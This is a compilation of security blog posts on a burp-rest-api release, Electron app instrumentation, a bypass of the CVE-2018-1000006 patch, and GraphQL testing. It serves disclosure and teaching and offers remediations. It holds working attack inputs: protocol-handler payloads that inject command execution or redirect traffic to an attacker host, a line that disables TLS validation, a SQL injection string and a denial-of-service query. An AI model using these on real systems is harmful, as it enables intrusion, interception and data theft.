ABOUT US

We are security engineers who break bits and tell stories.

© 2026 Doyensec LLC

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately internal security tools are rarely open-sourced, and still, too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone git@github.com:vmware/burp-rest-api.git

cd burp-rest-api

./gradlew clean build

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.

In order to implement this, we employed a classloading technique with a dummy entry point (BurpExtender.java) that loads the legacy Burp extension (LegacyBurpExtension.java) after the full Burp Suite has been loaded and launched (BurpService.java).

In this release, we have also focused our efforts on a massive issues house-cleaning:

With the release of Burp Suite Professional 2.0 (beta), Burp includes a native REST API.

While the current functionalities are very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native REST API; however, this new feature makes us wonder about the future of this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this GitHub Issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni

With the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments.

The Electron Framework is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project.

In Electron, the main process is the process that runs package.json’s main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called renderer processes.

Unlike regular browsers where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules.

As you might have guessed from recent public security vulnerabilities, the security implications are substantial since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron Security, hardening and vulnerabilities prevention in the official Security Recommendations document.

The first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (.asar file). ASAR archives are a simple tar-like format that concatenates files into a single one.

First locate the main ASAR archive of our app, usually named core.asar or app.asar.

Once we have this file we can proceed with installing the asar utility:

npm install -g asar

and extract the whole archive:

asar extract core.asar destinationfolder

In its simplest form, an Electron application includes three files: index.js, index.html and package.json.

Our first target to inspect is the package.json file, as it holds the path of the file responsible for the “entry point” of our application:

{

"name": "Example App",

"description": "Core App",

"main": "app/index.js",

"private": true

}

In our example the entry point is the file called index.js located within the app folder, which will be executed as the main process. If not specified, index.js is the default main file. The file index.html and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every BrowserWindow instantiated in the main process.
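The lookup described above can be sketched in a few lines of Node.js. This is only an illustration: the `resolveMainEntry` helper and the `destinationfolder` root are names assumed for the example, not part of Electron.

```javascript
const path = require('path');

// Hypothetical helper: returns the path of the main-process script declared
// in package.json, falling back to index.js when "main" is missing.
function resolveMainEntry(packageJsonText, appRoot) {
  const pkg = JSON.parse(packageJsonText);
  const hasMain = typeof pkg.main === 'string' && pkg.main.length > 0;
  const main = hasMain ? pkg.main : 'index.js';
  // path.posix keeps the output identical on every platform.
  return path.posix.join(appRoot, main);
}

const withMain = '{"name": "Example App", "main": "app/index.js", "private": true}';
const withoutMain = '{"name": "Example App"}';

console.log(resolveMainEntry(withMain, 'destinationfolder'));
console.log(resolveMainEntry(withoutMain, 'destinationfolder'));
```

Running it against the extracted folder tells us which file to open first when starting the review.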

In order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:

npm install

We should also install Devtron, a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, nodeIntegration must be enabled.

npm install --save-dev devtron

Then, run the following from the Console tab of the Developer Tools

require('devtron').install()

Whenever the application is neither minified nor obfuscated, we can easily inspect the code.

'use strict';

Object.defineProperty(exports, "__esModule", {

value: true

});

exports.startup = startup;

exports.handleSingleInstance = handleSingleInstance;

exports.setMainWindowVisible = setMainWindowVisible;

var _require = require('electron'),

Menu = _require.Menu;

var mainScreen = void 0;

function startup(bootstrapModules) {

[ -- cut -- ]

In case of obfuscation, there are no silver bullets to unfold heavily manipulated JavaScript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source.

Take this horrendous piece of JS as an example:

eval(function(c,d,e,f,g,h){g=function(i){return(i<d?'':g(parseInt(i/d)))+((i=i%d)>0x23?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d):i['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x24));};while(e--){if(f[e]){c=c['\x72\x65\x70\x6c\x61\x63\x65'](new RegExp('\x5c\x62'+g(e)+'\x5c\x62','\x67'),f[e]);}}return c;}('\x62\x20\x35\x3d\x5b\x22\x5c\x6f\x5c\x38\x5c\x70\x5c\x73\x5c\x34\x5c\x63\x5c\x63\x5c\x37\x22\x2c\x22\x5c\x72\x5c\x34\x5c\x64\x5c\x74\x5c\x37\x5c\x67\x5c\x6d\x5c\x64\x22\x2c\x22\x5c\x75\x5c\x34\x5c\x66\x5c\x66\x5c\x38\x5c\x71\x5c\x34\x5c\x36\x5c\x6c\x5c\x36\x22\x2c\x22\x5c\x6e\x5c\x37\x5c\x67\x5c\x36\x5c\x38\x5c\x77\x5c\x34\x5c\x36\x5c\x42\x5c\x34\x5c\x63\x5c\x43\x5c\x37\x5c\x76\x5c\x34\x5c\x41\x22\x5d\x3b\x39\x20\x6b\x28\x65\x29\x7b\x62\x20\x61\x3d\x30\x3b\x6a\x5b\x35\x5b\x30\x5d\x5d\x3d\x39\x28\x68\x29\x7b\x61\x2b\x2b\x3b\x78\x28\x65\x2b\x68\x29\x7d\x3b\x6a\x5b\x35\x5b\x31\x5d\x5d\x3d\x39\x28\x29\x7b\x79\x20\x61\x7d\x7d\x62\x20\x69\x3d\x7a\x20\x6b\x28\x35\x5b\x32\x5d\x29\x3b\x69\x2e\x44\x28\x35\x5b\x33\x5d\x29',0x28,0x28,'\x7c\x7c\x7c\x7c\x78\x36\x35\x7c\x5f\x30\x7c\x78\x32\x30\x7c\x78\x36\x46\x7c\x78\x36\x31\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x5f\x31\x7c\x76\x61\x72\x7c\x78\x36\x43\x7c\x78\x37\x34\x7c\x5f\x32\x7c\x78\x37\x33\x7c\x78\x37\x35\x7c\x5f\x33\x7c\x6f\x62\x6a\x7c\x74\x68\x69\x73\x7c\x4e\x65\x77\x4f\x62\x6a\x65\x63\x74\x7c\x78\x33\x41\x7c\x78\x36\x45\x7c\x78\x35\x39\x7c\x78\x35\x33\x7c\x78\x37\x39\x7c\x78\x36\x37\x7c\x78\x34\x37\x7c\x78\x34\x38\x7c\x78\x34\x33\x7c\x78\x34\x44\x7c\x78\x36\x44\x7c\x78\x37\x32\x7c\x61\x6c\x65\x72\x74\x7c\x72\x65\x74\x75\x72\x6e\x7c\x6e\x65\x77\x7c\x78\x32\x45\x7c\x78\x37\x37\x7c\x78\x36\x33\x7c\x53\x61\x79\x48\x65\x6c\x6c\x6f'['\x73\x70\x6c\x69\x74']('\x7c')));

It can be manually turned into:

eval(function (c, d, e, f, g, h) {

g = function (i) {

return (i < d ? '' : g(parseInt(i / d))) + ((i = i % d) > 35 ? String['fromCharCode'](i + 29) : i['toString'](36));

};

while (e--) {

if (f[e]) {

c = c['replace'](new RegExp('\\b' + g(e) + '\\b', 'g'), f[e]);

}

}

return c;

}('b 5=["\\o\\8\\p\\s\\4\\c\\c\\7","\\r\\4\\d\\t\\7\\g\\m\\d","\\u\\4\\f\\f\\8\\q\\4\\6\\l\\6","\\n\\7\\g\\6\\8\\w\\4\\6\\B\\4\\c\\C\\7\\v\\4\\A"];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])', 40, 40, '||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello'['split']('|')));

Then, it can be passed to JStillery, JS Nice and other similar tools in order to get back a human readable version.

'use strict';

var _0 = ["SayHello", "GetCount", "Message : ", "You are welcome."];

function NewObject(contentsOfMyTextFile) {

var _1 = 0;

this[_0[0]] = function(theLibrary) {

_1++;

alert(contentsOfMyTextFile + theLibrary);

};

this[_0[1]] = function() {

return _1;

};

}

var obj = new NewObject(_0[2]);

obj.SayHello(_0[3]);
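The first manual pass shown earlier (turning `\x66\x72...` into `fromCharCode` and `0x1d` into `29`) can be partly automated. The two helpers below are a minimal sketch written for this post, not part of JStillery or JS Nice. They deliberately leave escaped quotes and backslashes untouched so that string literals stay valid, which means `'\x5c\x62'` comes out as `'\x5cb'` rather than `'\\b'`.

```javascript
// Replaces \xNN escapes with the character they encode, but only for
// printable ASCII other than quotes and backslash.
function decodeHexEscapes(source) {
  return source.replace(/\\x([0-9a-fA-F]{2})/g, (match, hex) => {
    const code = parseInt(hex, 16);
    const ch = String.fromCharCode(code);
    const printable = code >= 0x20 && code <= 0x7e;
    const unsafe = ch === '\\' || ch === '"' || ch === "'";
    return printable && !unsafe ? ch : match;
  });
}

// Rewrites hexadecimal integer literals (0x1d) as decimal (29).
// Naive: it does not check whether the match sits inside a string.
function decodeHexNumbers(source) {
  return source.replace(/\b0x([0-9a-fA-F]+)\b/g, (match, hex) =>
    String(parseInt(hex, 16)));
}

// String.raw keeps the backslashes literal, as they appear in the file.
const packed = String.raw`String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d)`;
console.log(decodeHexNumbers(decodeHexEscapes(packed)));
```

The output of this pass is still packed code. It only makes the wrapper readable enough to decide which unpacker to apply next.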

During testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and <webview> tags.

Electron’s main process can use the BrowserWindow API to instantiate a new renderer.

In the example below, we are creating a new BrowserWindow instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:

/app/mainScreen.js

var winOptions = {

title: 'Example App',

backgroundColor: '#ffffff',

width: DEFAULT_WIDTH,

height: DEFAULT_HEIGHT,

minWidth: MIN_WIDTH,

minHeight: MIN_HEIGHT,

transparent: false,

frame: false,

resizable: true,

show: isVisible,

webPreferences: {

nodeIntegration: false,

preload: _path2.default.join(__dirname, 'preload.js')

}

};

[ -- cut -- ]

mainWindow = new _electron.BrowserWindow(winOptions);

winId = mainWindow.id;

//|--> HERE we can hook and add the Developer Tools <--|

mainWindow.webContents.openDevTools({ mode: 'bottom' })

mainWindow.setMenuBarVisibility(true);

If everything worked fine, we should have the Developer Tools enabled for the main UI screen.

From the main Developer Tools console, we can open additional Developer Tools windows for other renderers (e.g. webview tags).

window.document.getElementsByTagName("webview")[0].openDevTools()

While reading the code above, have you noticed the webPreferences options?

The webPreferences options are settings for the web page running in the renderer process, such as nodeIntegration, preload scripts and other security features. They sit inside the broader BrowserWindow options, which control things like window size, appearance and colors. Some of these settings are pretty useful for debugging purposes too.

For example, we can make all windows visible by using the show property of the BrowserWindow options:

new BrowserWindow({show: true})

During instrumentation, it is useful to include debugging code such as

console.log("\n--------------- Debug --------------------\n")

console.log(process.type)

console.log(process.pid)

console.log(process.argv)

console.log("\n--------------- Debug --------------------\n")

Since it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium’s Developer Tools can be used to debug Electron’s main process with just a minor adjustment.

The DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process you will need to leverage the native debugger and launch Electron with the --inspect or --inspect-brk switch.

Use one of the following command line switches to enable debugging of the main process:

--inspect=[port] Electron will listen for V8 inspector protocol messages on the specified port; an external debugger will need to connect on this port. The default port is 5858.

--inspect-brk=[port] Like --inspect but pauses execution on the first line of JavaScript.

Usage:

electron --inspect=5858 your-app

You can now connect Chrome by visiting chrome://inspect and analyze the launched Electron app present there.

Chromium supports system proxy settings on all platforms, so set up a proxy and then add the Burp CA as usual.

We can also use the following command line argument if we run the Electron application directly. Please note that this does not work when using the bundled app.

--proxy-server=address:port

Or, programmatically with these lines in the main app:

const {app} = require('electron')

app.commandLine.appendSwitch('proxy-server', '127.0.0.1:8080')

For Node, use transparent proxying by either changing /etc/hosts or overriding configs:

npm config set proxy http://localhost:8080

npm config set https-proxy http://localhost:8081

In case you need to revert the proxy settings, use:

npm config rm proxy

npm config rm https-proxy

However, you need to disable TLS validation with the following code within the application under testing:

process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";

Proper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities.

@voidsec @lucacarettoni

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

Under certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via security@electronjs.org) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

On January 22, 2018 Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>

window.location = 'myapp://foobar" --gpu-launcher="cmd /c start calc" --foobar='

</script>

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

<script>

window.location = 'myapp://foobar" --GPU-launcher="cmd /c start calc" --foobar='

</script>

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {

DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),

[](const char* a, const char* b) {

return base::StringPiece(a) < base::StringPiece(b);

}))

<< "The kBlacklist must be in sorted order";

DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),

base::StringPiece("inspect")))

<< "Remember to add Node command line flags to kBlacklist";

const base::CommandLine::StringType dashdash(2, '-');

bool block_blacklisted_args = false;

for (int i = 0; i < argc; ++i) {

if (argv[i] == dashdash)

break;

if (block_blacklisted_args) {

if (IsBlacklistedArg(argv[i]))

return false;

} else if (IsUrlArg(argv[i])) {

block_blacklisted_args = true;

}

}

return true;

}

As is commonly seen, blacklist-based validation is prone to errors and omissions, especially in complex execution environments like Electron.

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag one may specify a set of rules to rewrite domain names for requests issued by libchromiumcontent. This immediately stuck out as a good candidate for subverting the process.
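To make the gap concrete, here is a simplified JavaScript model of the loop in CheckCommandLineArguments. It is a sketch under stated assumptions: `BLACKLIST` is a tiny hypothetical subset of the real list, and `isUrlArg` and `isBlacklistedArg` are our own approximations, since their C++ counterparts are not reproduced in this post.

```javascript
// Hypothetical subset of the real blacklist, for illustration only.
const BLACKLIST = new Set(['gpu-launcher', 'inspect', 'inspect-brk']);

// Assumption: an argument is a URL when it starts with a scheme of at
// least two characters followed by a colon (so C:\ paths do not match).
function isUrlArg(arg) {
  return /^[a-z][a-z0-9+.-]+:/i.test(arg);
}

// Assumption: strip leading dashes and any =value, compare lowercased.
function isBlacklistedArg(arg) {
  if (!arg.startsWith('-')) return false;
  const name = arg.replace(/^-+/, '').split('=')[0].toLowerCase();
  return BLACKLIST.has(name);
}

// Mirrors the control flow of the C++ function shown above.
function checkCommandLineArguments(argv) {
  let blockBlacklistedArgs = false;
  for (const arg of argv) {
    if (arg === '--') break; // everything after "--" is left unchecked
    if (blockBlacklistedArgs) {
      if (isBlacklistedArg(arg)) return false;
    } else if (isUrlArg(arg)) {
      blockBlacklistedArgs = true;
    }
  }
  return true;
}

const blocked = ['app.exe', 'myapp://foobar', '--gpu-launcher=cmd /c start calc', '--foobar='];
const missed = ['app.exe', 'myapp://foobar', '--host-rules=MAP * evil.example', '--foobar='];
console.log(checkCommandLineArguments(blocked)); // rejected: flag is listed
console.log(checkCommandLineArguments(missed));  // accepted: flag is not listed
```

Any switch that is missing from the list passes the check untouched, which is why a single omission is enough for a bypass.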

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>

<script>

window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='

</script>

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oauth tokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason Electron’s update feature, along with other critical functions, is not affected by this vulnerability.

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are advised to enforce a dash-dash notation in setAsDefaultProtocolClient:

app.setAsDefaultProtocolClient(protocol, process.execPath, [

'--your-switches-here',

'--'

])



or in the Windows protocol handler registry entry

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.

@ikkisoft

@day6reak

With the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes.

GraphQL is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST APIs.

Even if you don’t see any GraphQL out there, it is likely you’re already using it, since it powers big tech companies such as Facebook, GitHub, Pinterest, Twitter, HackerOne and many more.

GraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. Queries always return predictable results.

While typical REST APIs require loading from multiple URLs, GraphQL APIs get all the data your app needs in a single request.

GraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of all your data from a single endpoint.

GraphQL is strongly typed to ensure that applications only ask for what’s possible and to provide clear and helpful errors.

New fields and types can be added to the GraphQL API without impacting existing queries. Aging fields can be deprecated and hidden from tools.

Before we start diving into the GraphQL security landscape, here is a brief recap on how it works. The official documentation is well written and was really helpful.

A GraphQL query looks like this:

Basic GraphQL Query

query{

user{

id

email

firstName

lastName

}

}

While the response is JSON:

Basic GraphQL Response

{

"data": {

"user": {

"id": "1",

"email": "paolo@doyensec.com",

"firstName": "Paolo",

"lastName": "Stagno"

}

}

}



Since Burp Suite does not understand GraphQL syntax well, I recommend using graphql-ide, an Electron-based app that allows you to edit and send requests to a GraphQL endpoint. I also wrote a small Python script, GraphQL_Introspection.py, that enumerates a GraphQL endpoint (with introspection) in order to pull out documentation. The script is useful for examining the GraphQL schema and looking for information leakage, hidden data and fields that are not intended to be accessible.

The tool will generate an HTML report similar to the following:

Introspection is used to ask a GraphQL schema for information about what queries, types and so on it supports.
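As a rough illustration (this is not the GraphQL_Introspection.py script mentioned above), the sketch below builds a minimal introspection request and flattens a parsed response into `Type.field` names. The helper names and the Bearer authorization scheme are assumptions made for the example. The `__schema` meta field and its `types`, `name`, `kind` and `fields` selections are standard GraphQL introspection.

```javascript
// Minimal introspection query: every type with its kind and field names.
const INTROSPECTION_QUERY = `
  query {
    __schema {
      queryType { name }
      types { name kind fields { name } }
    }
  }
`;

// Hypothetical helper: describes the HTTP request without sending it.
// The Bearer scheme is an assumption; use whatever the target expects.
function buildIntrospectionRequest(endpoint, authToken) {
  const headers = { 'Content-Type': 'application/json' };
  if (authToken) headers.Authorization = `Bearer ${authToken}`;
  return {
    url: endpoint,
    method: 'POST',
    headers,
    body: JSON.stringify({ query: INTROSPECTION_QUERY }),
  };
}

// Flattens a parsed introspection response into "Type.field" strings,
// skipping the built-in double-underscore types and types without fields.
function listFields(introspectionResponse) {
  const names = [];
  for (const type of introspectionResponse.data.__schema.types) {
    if (type.name.startsWith('__') || !Array.isArray(type.fields)) continue;
    for (const field of type.fields) names.push(`${type.name}.${field.name}`);
  }
  return names;
}

// Made-up response used only to exercise listFields.
const sampleResponse = { data: { __schema: { types: [
  { name: 'User', kind: 'OBJECT', fields: [{ name: 'id' }, { name: 'password' }] },
  { name: 'String', kind: 'SCALAR', fields: null },
  { name: '__Type', kind: 'OBJECT', fields: [{ name: 'name' }] },
] } } };
console.log(listFields(sampleResponse));
```

Scanning the flattened list for names such as `password` or `token` is a quick way to spot fields that were probably not meant to be exposed.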

As a pentester, I recommend looking for requests issued to “/graphql” or “/graphql.php”, since those are common GraphQL endpoint names. You should also search for “/graphiql” and “graphql/console/” (online GraphQL IDEs that interact with the backend) and “/graphql.php?debug=1” (debugging mode with additional error reporting), since they may be left open by developers.



When testing an application, verify whether requests can be issued without the usual authorization token header:

Since the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:

“However, for a production codebase, delegate authorization logic to the business logic layer”.

Things may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server.

When building an application with GraphQL, developers have to map data to queries in their chosen database technology. This is where security vulnerabilities can be easily introduced, leading to Broken Access Controls, Insecure Direct Object References and even SQL/NoSQL Injections.

As an example of a broken implementation, the following request/response demonstrates that we can fetch data for any users of the platform (cycling through the ID parameter), while simultaneously dumping password hashes:

Query

query{

user(id: 165274){

id

email

firstName

lastName

password

}

}

Response

{

"data": {

"user": {

"id": "165274",

"email": "johndoe@mail.com",

"firstName": "John",

"lastName": "Doe",

"password": "5F4DCC3B5AA765D61D8327DEB882CF99"

}

}

}
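One way to avoid this class of bug is to enforce both the ownership check and a field allowlist inside the resolver (or the business logic it delegates to). The sketch below assumes the common `(parent, args, context)` resolver signature. The `USERS` map, the `viewer` object on the context and its `isAdmin` flag are hypothetical stand-ins for a real data layer and session.

```javascript
// Hypothetical in-memory store standing in for the real database.
const USERS = new Map([
  [165274, { id: 165274, email: 'johndoe@mail.com', firstName: 'John',
             lastName: 'Doe', password: 'stored-hash-placeholder' }],
]);

// Only these fields may ever leave the resolver.
const PUBLIC_FIELDS = ['id', 'email', 'firstName', 'lastName'];

function resolveUser(parent, args, context) {
  // Authentication: reject anonymous callers.
  if (!context.viewer) throw new Error('Not authenticated');
  // Authorization: a viewer may only read their own record unless admin.
  if (context.viewer.id !== args.id && !context.viewer.isAdmin) {
    throw new Error('Not authorized');
  }
  const record = USERS.get(args.id);
  if (!record) return null;
  // Copy allowlisted fields so the password hash is never returned.
  const result = {};
  for (const field of PUBLIC_FIELDS) result[field] = record[field];
  return result;
}

console.log(resolveUser(null, { id: 165274 }, { viewer: { id: 165274 } }));
```

With this in place, cycling through the id argument as another user fails the authorization check, and even a legitimate request cannot select the password hash.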

You should also check for information disclosure in the errors returned when performing invalid queries:

Information Disclosure

{

"errors": [

{

"message": "Invalid ID.",

"locations": [

{

"line": 2,

"column": 12

}

],

"Stack": "Error: invalid ID\n at (/var/www/examples/04-bank/graphql.php)\n"

}

]

}
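On the defensive side, a server can strip stack traces and internal messages before an error reaches the client. The formatter below is a minimal sketch. The `clientSafe` flag is a hypothetical convention for marking errors whose message may be shown to users, and the `debug` option is our own name, not a setting of any particular GraphQL library.

```javascript
// Hypothetical formatter: converts an internal error into the object that
// is placed in the "errors" array of the GraphQL response.
function formatErrorForClient(error, { debug = false } = {}) {
  const formatted = {
    // Only errors explicitly marked as safe keep their message.
    message: error.clientSafe ? error.message : 'Internal server error',
  };
  if (Array.isArray(error.locations)) formatted.locations = error.locations;
  // Stack traces are attached only when debugging is explicitly enabled.
  if (debug) formatted.stack = error.stack;
  return formatted;
}

const failure = new Error('invalid ID');
failure.locations = [{ line: 2, column: 12 }];
console.log(formatErrorForClient(failure));
```

During an assessment, the presence of file paths or stack frames in a response suggests that a debug setting of this kind was left enabled.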

Even though GraphQL is strongly typed, SQL/NoSQL injections are still possible, since GraphQL is just a layer between client apps and the database. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to query the database; variables that are not properly sanitized lead to plain old SQL injection. In the case of MongoDB, NoSQL injection may not be that simple since we cannot “juggle” types (e.g. turning a string into an array; see PHP MongoDB Injection).

GraphQL SQL Injection

mutation search($filters: Filters!){

authors(filter: $filters)

viewer{

id

email

firstName

lastName

}

}

{

"filters":{

"username":"paolo' or 1=1--",

"minstories":0

}

}
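The usual fix lives in the data layer: keep the filter values out of the SQL text and pass them as bound parameters. The sketch below is illustrative only. The `authors` table, its column names and the PostgreSQL-style `$1` placeholders are assumptions, and `buildAuthorQuery` is a hypothetical helper whose result would be handed to a database driver that supports parameterized queries.

```javascript
// Allowlist mapping GraphQL filter names to a column, operator and type.
// Table and column names are assumptions for this example.
const FILTERS = {
  username: { column: 'username', op: '=', type: 'string' },
  minstories: { column: 'story_count', op: '>=', type: 'number' },
};

// Builds a parameterized query: user input only ever lands in `values`.
function buildAuthorQuery(filters) {
  const clauses = [];
  const values = [];
  for (const [key, value] of Object.entries(filters)) {
    if (!Object.prototype.hasOwnProperty.call(FILTERS, key)) {
      throw new Error(`Unknown filter: ${key}`);
    }
    const { column, op, type } = FILTERS[key];
    if (typeof value !== type) throw new Error(`Invalid type for ${key}`);
    values.push(value);
    clauses.push(`${column} ${op} $${values.length}`);
  }
  const where = clauses.length ? ` WHERE ${clauses.join(' AND ')}` : '';
  return { text: `SELECT id, username FROM authors${where}`, values };
}

console.log(buildAuthorQuery({ username: "paolo' or 1=1--", minstories: 0 }));
```

The injection string from the example above ends up as an ordinary value to compare against, not as part of the statement.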

Beware of nested queries! They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that will consume all the resources of the server:

Nested Query

query {

stories{

title

body

comments{

comment

author{

comments{

author{

comments{

comment

author{

comments{

comment

author{

comments{

comment

author{

name

}

}

}

}

}

}

}

}

}

}

}

}

An easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value.
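A maximum depth check can be approximated without a full parser by counting nested braces. The sketch below is deliberately naive and is not how any particular GraphQL server implements it: it skips string literals and `#` comments, but it also counts input object literals in arguments and does not follow fragments, so a production implementation should walk the parsed query instead. The function names and the limit of 3 are arbitrary choices for the example.

```javascript
// Returns the deepest level of brace nesting found in the query text.
function queryDepth(query) {
  let depth = 0;
  let max = 0;
  let inString = false;
  for (let i = 0; i < query.length; i++) {
    const ch = query[i];
    if (inString) {
      if (ch === '\\') i++;            // skip the escaped character
      else if (ch === '"') inString = false;
      continue;
    }
    if (ch === '"') {
      inString = true;
    } else if (ch === '#') {
      // Comment: ignore everything up to the end of the line.
      while (i < query.length && query[i] !== '\n') i++;
    } else if (ch === '{') {
      depth++;
      if (depth > max) max = depth;
    } else if (ch === '}') {
      depth--;
    }
  }
  return max;
}

// Rejects queries nested deeper than maxDepth before they are executed.
function enforceMaxDepth(query, maxDepth) {
  const depth = queryDepth(query);
  if (depth > maxDepth) {
    throw new Error(`Query depth ${depth} exceeds limit ${maxDepth}`);
  }
  return depth;
}

const shallow = 'query { stories { title comments { comment } } }';
console.log(enforceMaxDepth(shallow, 3));
```

Applied to the nested query shown above, which opens twelve levels of braces, the same call with a limit of 3 would throw before the query reaches any resolver.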

Keep in mind that in the PHP GraphQL implementation:

Complexity analysis is disabled by default

Limiting Query Depth is disabled by default

Introspection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing the meta fields __type and __schema.

